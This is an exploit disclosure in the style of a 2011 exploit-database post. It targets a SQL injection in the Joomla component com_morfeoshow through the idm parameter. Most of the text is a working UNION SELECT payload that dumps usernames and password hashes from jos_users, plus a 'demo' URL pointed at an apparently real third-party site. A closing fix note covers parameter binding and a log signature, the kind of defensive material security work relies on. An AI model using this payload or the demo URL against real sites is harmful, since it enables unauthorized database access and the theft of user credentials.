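#############################################################
Joomla Component com_morfeoshow SQL Injection Vulnerability
#############################################################

# Author : Th3.xin0x
# Greetz : P0fk - ksha - S[e]C - seth - pks - xacks - OzX All My Friends :)
# Special thanks to: www.mitm.cl - https://foro.undersecurity.net
# Name : Joomla com_morfeoshow
# Bug Type : SQL injection
# Parameter : idm (the payload below is appended to its value)

+--+
Example:
site.com/index.php?option=com_morfeoshow&task=view&gallery=1&Itemid=114&Itemid=114&idm=
+--+
EXPLOIT :
+and+1=0+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+--+
+--+
DEMO:
http://www.ucinf.cl/index.php?option=com_morfeoshow&task=view&gallery=1&Itemid=114&Itemid=114&idm=1015+and+1=0+union+select+1,2,concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+--+

# Fix : the component source is not shown here; the requests above suggest that idm reaches the SQL query unvalidated, so it should be cast to an integer or bound as a query parameter before use. Requests to com_morfeoshow whose idm value contains "union" and "select" are a usable log signature, and the credentials in jos_users should be treated as exposed on any site where such requests succeeded.

[2011-06-26]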